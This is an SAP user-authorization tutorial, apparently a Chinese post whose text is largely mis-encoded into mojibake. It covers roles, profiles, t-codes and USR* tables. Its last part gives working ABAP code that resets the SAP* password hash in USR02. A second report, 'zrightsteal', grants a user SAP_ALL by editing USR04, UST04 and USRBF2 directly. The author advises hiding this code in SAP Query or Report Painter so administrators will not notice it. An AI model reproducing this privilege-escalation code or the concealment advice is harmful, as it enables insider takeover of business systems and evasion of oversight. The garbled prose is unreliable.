鐢ㄦ埛鏉冮檺瑙e墫:
閫氬父basis浼?xì)鋴社敤PFCG鍋氭潈闄愮鐞?鏃朵綘淇濆瓨鏃朵細(xì)浜х敓涓涓郴緇熷鐨刾rifile name,
璁板緱SU01鏃剁敤鎴鋒湁profile 鍜宺ole涓ゆ爮浣嶅悧?瀹冧滑鐨勫叧緋誨浣曞憿?
棣栧厛鏄庣櫧鍑犱釜姒傚康.
1.activity
榪欐牱璇村惂,鎴戜滑浠巃ctivity璋堣搗,activity鏄粈涔堟剰鎬濊繖涓綘鏌ヤ笅
瀛楀吀涔熷氨鐭ラ亾浜?瀵瑰氨鏄瀹氬彲鍋氫粈涔堝姩浣?姣斿璇翠笉鑳藉惛鐑熷彧鑳藉枬閰?涓嶈兘澶氫簬2涓?
涓嶅,榪欐槸鎴戣佸﹩璁茬殑,SAP涓嶆槸榪欐牱瀛愮殑,鏄彧鑳絠nsert, update,display浠涔堢殑.
榪欎簺涓滆タ褰撳勾寰峰浗浣槸鍐欏湪tobj琛ㄤ腑鐨?
activity 涔熸槸鍙垎activity group鐨?
2.activity category &Authorization group
Role Vs Profile
浣犵湅鐪嬭〃T020灝辯煡閬撲簡,灝辨槸浠涔圞,D, A, M浠涔堢殑.
profile鏄粈涔堝憿?瀹為檯涓婂彲浠ョ悊瑙d負(fù)鎵鏈夌殑authorization data(鏈夊緢澶歛uthorization group--{浣犲彲浣跨敤OBA7濉啓,
鏉冮檺澶粏涔熶笉鏄ソ浜媈_^}鍜宎ctivity緇勬垚)鐨勪竴涓泦鍚堢殑鍚嶅瓧,閫氬父涓涓嚜瀹氫箟鐨剅ole浜?br>鐢熶竴涓猵rofile,SAP鏉冮檺鎺у埗鏄牴鎹畃rofile閲岀殑authorization data(objects)鏉ユ帶鍒剁殑.
role鍙堟槸浠涔堝憿?role鍙槸涓涓悕瀛楄屽凡,鐒跺悗灝唒rofile璧嬩簣緇欏畠, 姣斿浣燬U01寤虹珛涓涓?br>鐢ㄦ埛,鎴戞病鏈変換浣時ole,浣嗘槸鍔犲SAP_All profile
涔熸槸鍙仛浠諱綍浜嬫儏.
SAP鏈韓鏈夊緢澶歞efault role & profile.
3.鏈甯哥敤鐨凱FCG->authorizations->change authorization data->
榪涘叆鍚庨夊彇selection criteria 鍙湅鍒版墍鏈夌殑authorization object
manually鍙墜宸ュ姞authorization object,姣斿浣犱嬌鐢ㄦ煇涓猼-code鏉冮檺鍑洪敊璇?abap浣跨敤SU53媯鏌ュ氨
鐭ラ亾緙哄皯鍝釜authorization objec,鐒跺悗鎵嬪伐鍔犲叆灝卞彲浠?
浣犻夊幓authorization levels灝卞彲by account type鍐嶇粏鍒嗘潈闄?
鏈変簺鐢氳嚦鐩存帴鍒拌〃瀛楁.鑰屼笖浣犵敋鑷沖彲緄︿竴涓猳bject鍒嗛厤緙撳瓨buffer.
閭d箞SAP鏄浣曞仛鍒版潈闄愭帶鍒剁殑鍛?灞犲か灝辯敤鍒板皬瀹頒竴涓?
4.鍏充簬鏉冮檺鏂歸潰鐨勫嚑涓猼-code.
(涓)Role(瑙掕壊)鐩稿叧T-code:
PFAC 鏍囧噯
PFAC_CHG 鏀瑰彉
PFAC_DEL 鍒犻櫎
PFAC_DIS 鏄劇ず
PFAC_INS 鏂板緩
PFAC_STR
PFCG 鍒涘緩
ROLE_CMP 姣旇緝
SUPC 鎵歸噺寤虹珛瑙掕壊profile
SWUJ 嫻嬭瘯
SU03 媯嫻媋uthorzation data
SU25, SU26 媯鏌pdated profile
(浜?寤虹珛鐢ㄦ埛鐩稿叧T-code:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, Su51, SU52
SU1
SU10 鎵歸噺
SU12 鎵歸噺
SUCOMP:緇存姢鐢ㄦ埛鍏徃鍦板潃
SU2 change鐢ㄦ埛鍙傛暟
SUIM 鐢ㄦ埛淇℃伅緋葷粺
鐢ㄦ埛緇?br>SUGR:緇存姢
SUGRD:鏄劇ず
SUGRD_NAV:榪樻槸緇存姢
SUGR_NAV:榪樻槸鏄劇ず
(涓?鍏充簬profile&Authoraztion Data
SU02:鐩存帴鍒涘緩profile涓嶇敤role
SU20:緇嗗垎Authorization Fields
SU21(SU03):****緇存姢Authorization Objects(TOBJ,USR12).
瀵逛簬鍑瘉浣犲彲緇嗗垎鍒?
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
鐒跺悗浣犺繘鍘昏繕鍙粏鍒?榪欎簺涓笢瑗挎槸save鍦║SR12琛ㄤ腑鐨? 鍦―B灞傛槸UTAB.
瀵瑰叿浣搕ransaction code緇嗗垎:
SU22,SU24
SU53:*** 灝辨槸浣犲嚭閿欑敤鏉ユ鏌ユ病鏈夐偅浜沘uthoraztion objects.
SU56:鍒嗘瀽authoraztion data buffers.
SU87:鐢ㄦ潵媯鏌ョ敤鎴鋒敼鍙樹駭鐢熺殑history
SU96,SU97,SU98,SU99:騫插暐鐨?
SUPC:鎵歸噺浜х敓role
DB鍜宭ogical灞?
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All avaiable authorzation objects.(鍏ㄥ湪姝?
USR12: 鐢ㄦ埛綰uthoraztion鍊?br>-----------------------------
USR01:涓繪暟鎹?br>USR02:瀵嗙爜鍦ㄦ
USR04:鎺堟潈鍦ㄦ
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:褰撳墠鐢ㄦ埛
USREFUS:
USRBF2
USRBF3
UST04:User Profile鍦ㄦ
UST10C: Composite profiles
UST10S: Single profiles (瑙掕壊瀵瑰簲鐨?br>UST12 : Authorizations..............................
..............................
濡備綍紿冨彇鏉冮檺
..............................
鐢ㄦ埛:
User type鐢ㄦ埛綾誨瀷(騫插暐鐢ㄧ殑涓嶈):
閫氬父鐨勭敤鎴風(fēng)被鍨嬫湁
a.dialog (灝辨槸normal user)
b.communication
c.system
d.service
e.reference.
閫氬父浣犲湪浣跨敤浠諱綍T-code鍓嶄竴瀹氫細(xì)鏈夋潈闄愭嫻嬬殑.
AUTHORITY_CHECK:榪欎釜鍑芥暟鍙槸灝忔鏌ヤ竴涓嬩綘鐨剈ser鏈夋病鏈?浠涔堟椂鍊欒繃鏈?
**濡傛灉coding鍙浣跨敤姝ゅ嚱鏁板氨澶熶簡.
AUTHORITY_CHECK_TCODE:媯鏌-code
榪欏嗗嚱鏁版槸鐪熸媯鏌utorization objects鐨?
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
灝哠AP*鐨勫瘑鐮佹敼鎴?23鐨勭▼搴?寰堢畝鍗?
鎴戜滑鎵懼埌閭d釜user logon琛║SR02.
(DF52478E6FF90EEB鏄粡榪嘢AP鍔犲瘑淇濆瓨鍦―B鐨?鍝綅鑰佸厔鐮旂┒榪嘢AP鐨勫瘑鐮佸姞瀵?)
report zmodSAP*.
data zUSR02 like USR02 .
select single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02 .
鐜板湪鐨勯棶棰樻槸濡備綍璁╀綘閭asis涓嶅彂鐜?寰堢畝鍗?灝哻ode闅愯棌鍦≦uery閲岄潰,灝辨槸璇翠綘鍋氫竴涓?br>query,query鏄細(xì)浜х敓code鐨?鐒跺悗浣犲姞鍏ユ浠g爜,璋佽兘鎯沖埌???鐒跺悗浣犲氨絳変綘鐨刡asis鍘誨摥...
榪欐牱鍋氬お鐙犳瘨浜?榪樻槸鑷繁鍋峰伔鎼炶嚜宸辯殑鐢ㄦ埛鍚?
鍦ㄦ浣犲繀欏誨鏉冮檺緇撴瀯闈炲父娓呮櫚.
鏉冮檺鍜屼笁涓〃鏈夊叧緋?
a.USR04
b.USR04
c.USRBF2 榪欎釜琛ㄦ槸瀵瑰簲鍒版墍鐢ㄧ殑authorzization objects鐨?
*&---------------------------------------------------------------------*
*& Report : Steal SAP ALL Right *
*& Creation Date : 2004.04.01 *
*& Created by : Stone.Fu *
*& Description : 鍙獌鍙朣AP ALL鏉冮檺 *
*& Modified Date : 2005.11.02
*& Description : 灝嗘code hide鍦╮eport painter or query code *
*&---------------------------------------------------------------------*
report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All 鏉冮檺
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS = zPROFS.
Update USR04 from zUSR04 .
**Update User authorization masters table UST04 .
select single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE = 'SAP_ALL'. "SAP all 鏉冮檺
Update UST04 from zUST04 .
*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .
select * from USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
鑷繁寤虹珛涓涓獄test鐢ㄦ埛涓嶇粰瀹冧換浣曟潈闄愮劧鍚庡湪test machine涓妑un 鎶ヨ〃zrightsteal.
鐒跺悗ztest灝辨槸SAP_ALL浜? 鐒跺悗浣犲皢code hide鍦⊿QP query鐨刢ode涓? ABAP code澶鏄撹浜哄彂鐜? K, 鐜板湪鎴戠鍒頒竴涓ぇ闂浜? 璁板笎紼嬪簭琚敼鐨勫嚭浜嗛棶棰?.
]]>